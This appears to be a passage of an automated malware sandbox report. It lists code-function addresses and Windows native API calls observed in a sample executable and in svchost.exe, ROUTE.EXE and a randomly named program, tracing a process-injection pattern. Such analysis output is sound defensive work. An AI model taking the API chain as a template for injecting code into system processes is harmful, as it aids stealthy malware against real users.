                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_032D2BF0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2AF0 NtWriteFile,LdrInitializeThunk,6_2_032D2AF0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2AD0 NtReadFile,LdrInitializeThunk,6_2_032D2AD0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2F30 NtCreateSection,LdrInitializeThunk,6_2_032D2F30
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2FB0 NtResumeThread,LdrInitializeThunk,6_2_032D2FB0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2FE0 NtCreateFile,LdrInitializeThunk,6_2_032D2FE0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_032D2E80
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_032D2EE0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_032D2D30
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_032D2D10
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_032D2DF0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2DD0 NtDelayExecution,LdrInitializeThunk,6_2_032D2DD0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2C60 NtCreateKey,LdrInitializeThunk,6_2_032D2C60
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_032D2C70
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_032D2CA0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D35C0 NtCreateMutant,LdrInitializeThunk,6_2_032D35C0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D39B0 NtGetContextThread,LdrInitializeThunk,6_2_032D39B0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2B80 NtQueryInformationFile,6_2_032D2B80
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2AB0 NtWaitForSingleObject,6_2_032D2AB0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2F60 NtCreateProcessEx,6_2_032D2F60
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2FA0 NtQuerySection,6_2_032D2FA0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2F90 NtProtectVirtualMemory,6_2_032D2F90
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2E30 NtWriteVirtualMemory,6_2_032D2E30
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2EA0 NtAdjustPrivilegesToken,6_2_032D2EA0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2D00 NtSetInformationFile,6_2_032D2D00
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2DB0 NtEnumerateKey,6_2_032D2DB0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2C00 NtQueryInformationProcess,6_2_032D2C00
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2CF0 NtOpenProcess,6_2_032D2CF0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D2CC0 NtQueryVirtualMemory,6_2_032D2CC0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D3010 NtOpenDirectoryObject,6_2_032D3010
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D3090 NtSetValueKey,6_2_032D3090
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D3D10 NtOpenProcessToken,6_2_032D3D10
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D3D70 NtOpenThread,6_2_032D3D70
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02AB9730 NtCreateFile,6_2_02AB9730
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02AB9A30 NtClose,6_2_02AB9A30
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02AB9BA0 NtAllocateVirtualMemory,6_2_02AB9BA0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02AB98A0 NtReadFile,6_2_02AB98A0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02AB9990 NtDeleteFile,6_2_02AB9990
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DDD5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_00DDD5EB
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DD1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,74735590,CreateProcessAsUserW,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,0_2_00DD1201
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DDE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00DDE8F6
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D7BF400_2_00D7BF40
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DE20460_2_00DE2046
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D780600_2_00D78060
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DD82980_2_00DD8298
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DAE4FF0_2_00DAE4FF
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DA676B0_2_00DA676B
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00E048730_2_00E04873
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D7CAF00_2_00D7CAF0
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D9CAA00_2_00D9CAA0
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D8CC390_2_00D8CC39
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DA6DD90_2_00DA6DD9
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D791C00_2_00D791C0
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D8B1190_2_00D8B119
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D913940_2_00D91394
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D917060_2_00D91706
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D9781B0_2_00D9781B
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D919B00_2_00D919B0
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D8997D0_2_00D8997D
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D779200_2_00D77920
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D97A4A0_2_00D97A4A
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D97CA70_2_00D97CA7
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D91C770_2_00D91C77
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DA9EEE0_2_00DA9EEE
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DFBE440_2_00DFBE44
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D91F320_2_00D91F32
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_010448500_2_01044850
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418A931_2_00418A93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004011D01_2_004011D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042F2431_2_0042F243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402A5C1_2_00402A5C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402A601_2_00402A60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004022C01_2_004022C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041028D1_2_0041028D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004102931_2_00410293
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E4931_2_0040E493
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416C9E1_2_00416C9E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416CA31_2_00416CA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004104B31_2_004104B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E5E31_2_0040E5E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E5E81_2_0040E5E8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004025801_2_00402580
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402F301_2_00402F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F01_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D003E61_2_03D003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA3521_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC02C01_2_03CC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE02741_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF81CC1_2_03CF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF41A21_2_03CF41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D001AA1_2_03D001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC81581_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C301001_2_03C30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA1181_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD20001_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3C7C01_2_03C3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C647501_2_03C64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C407701_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5C6E01_2_03C5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D005911_2_03D00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C405351_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEE4F61_2_03CEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF24461_2_03CF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE44201_2_03CE4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF6BD71_2_03CF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFAB401_2_03CFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA801_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A01_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0A9A61_2_03D0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C569621_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E8F01_2_03C6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C268B81_2_03C268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4A8401_2_03C4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C428401_2_03C42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32FC81_2_03C32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBEFA01_2_03CBEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4F401_2_03CB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C82F281_2_03C82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60F301_2_03C60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE2F301_2_03CE2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFEEDB1_2_03CFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C52E901_2_03C52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFCE931_2_03CFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40E591_2_03C40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFEE261_2_03CFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3ADE01_2_03C3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C58DBF1_2_03C58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4AD001_2_03C4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDCD1F1_2_03CDCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30CF21_2_03C30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0CB51_2_03CE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40C001_2_03C40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8739A1_2_03C8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2D34C1_2_03C2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF132D1_2_03CF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5B2C01_2_03C5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE12ED1_2_03CE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5D2F01_2_03C5D2F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C452A01_2_03C452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4B1B01_2_03C4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7516C1_2_03C7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2F1721_2_03C2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0B16B1_2_03D0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEF0CC1_2_03CEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C470C01_2_03C470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF70E91_2_03CF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFF0E01_2_03CFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFF7B01_2_03CFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF16CC1_2_03CF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C856301_2_03C85630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D095C31_2_03D095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDD5B01_2_03CDD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF75711_2_03CF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C314601_2_03C31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFF43F1_2_03CFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB5BF01_2_03CB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7DBF91_2_03C7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5FB801_2_03C5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFB761_2_03CFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEDAC61_2_03CEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDDAAC1_2_03CDDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C85AA01_2_03C85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE1AA31_2_03CE1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFA491_2_03CFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF7A461_2_03CF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB3A6C1_2_03CB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C499501_2_03C49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5B9501_2_03C5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD59101_2_03CD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C438E01_2_03C438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAD8001_2_03CAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C03FD21_2_03C03FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C03FD51_2_03C03FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C41F921_2_03C41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFFB11_2_03CFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFF091_2_03CFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C49EB01_2_03C49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5FDC01_2_03C5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C43D401_2_03C43D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF1D5A1_2_03CF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF7D731_2_03CF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFCF21_2_03CFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB9C321_2_03CB9C32
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049C85725_2_049C8572
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049D0DD05_2_049D0DD0
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049D0DCB5_2_049D0DCB
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049C85C05_2_049C85C0
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049CA5E05_2_049CA5E0
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049C87155_2_049C8715
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049C87105_2_049C8710
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049CA3BA5_2_049CA3BA
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049CA3C05_2_049CA3C0
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049D2BC05_2_049D2BC0
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeCode function: 5_2_049E93705_2_049E9370
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335A3526_2_0335A352
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033603E66_2_033603E6
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032AE3F06_2_032AE3F0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033402746_2_03340274
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033202C06_2_033202C0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032901006_2_03290100
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0333A1186_2_0333A118
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033281586_2_03328158
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033541A26_2_033541A2
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033601AA6_2_033601AA
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033581CC6_2_033581CC
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033320006_2_03332000
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032A07706_2_032A0770
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032C47506_2_032C4750
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0329C7C06_2_0329C7C0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032BC6E06_2_032BC6E0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032A05356_2_032A0535
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033605916_2_03360591
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033444206_2_03344420
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033524466_2_03352446
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0334E4F66_2_0334E4F6
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335AB406_2_0335AB40
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03356BD76_2_03356BD7
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0329EA806_2_0329EA80
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032B69626_2_032B6962
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032A29A06_2_032A29A0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0336A9A66_2_0336A9A6
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032A28406_2_032A2840
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032AA8406_2_032AA840
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032868B86_2_032868B8
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032CE8F06_2_032CE8F0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03342F306_2_03342F30
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032E2F286_2_032E2F28
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032C0F306_2_032C0F30
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03314F406_2_03314F40
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0331EFA06_2_0331EFA0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03292FC86_2_03292FC8
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335EE266_2_0335EE26
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032A0E596_2_032A0E59
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335CE936_2_0335CE93
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032B2E906_2_032B2E90
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335EEDB6_2_0335EEDB
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032AAD006_2_032AAD00
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0333CD1F6_2_0333CD1F
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032B8DBF6_2_032B8DBF
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0329ADE06_2_0329ADE0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032A0C006_2_032A0C00
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03340CB56_2_03340CB5
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03290CF26_2_03290CF2
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335132D6_2_0335132D
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0328D34C6_2_0328D34C
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032E739A6_2_032E739A
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032A52A06_2_032A52A0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033412ED6_2_033412ED
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032BD2F06_2_032BD2F0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032BB2C06_2_032BB2C0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032D516C6_2_032D516C
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0328F1726_2_0328F172
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0336B16B6_2_0336B16B
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032AB1B06_2_032AB1B0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335F0E06_2_0335F0E0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033570E96_2_033570E9
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032A70C06_2_032A70C0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0334F0CC6_2_0334F0CC
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335F7B06_2_0335F7B0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032E56306_2_032E5630
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033516CC6_2_033516CC
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033575716_2_03357571
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0333D5B06_2_0333D5B0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_033695C36_2_033695C3
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335F43F6_2_0335F43F
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032914606_2_03291460
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335FB766_2_0335FB76
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032BFB806_2_032BFB80
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03315BF06_2_03315BF0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032DDBF96_2_032DDBF9
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03313A6C6_2_03313A6C
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03357A466_2_03357A46
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0335FA496_2_0335FA49
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_032E5AA06_2_032E5AA0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03341AA36_2_03341AA3
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0333DAAC6_2_0333DAAC
